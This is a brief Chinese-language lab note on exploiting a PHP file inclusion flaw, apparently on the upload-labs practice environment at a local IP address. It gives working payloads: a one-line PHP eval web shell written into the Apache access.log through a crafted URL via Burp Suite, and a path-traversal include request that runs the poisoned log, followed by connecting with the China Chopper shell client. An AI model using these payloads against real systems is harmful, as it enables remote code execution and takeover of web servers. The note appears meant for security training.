文件包含奇淫技巧

D:\phpStudy2018\PHPTutorial\Apache\logs\access.log是 Apache 服务器用于记录客户端对服务器资源访问情况的日志文件，但网站存在包含漏洞时，写入一句话木马能被存放到日志文件中

payload：http://192.168.1.117/upload-labs/include/<?php @eval($_POST['cmd']);?>

用burpsuite抓包，在URL后面加入一句话，即可把木马插入access.log中去，再用菜刀连接

payload：http://192.168.1.117/upload-labs/include.php?file=../../apache/logs/access.log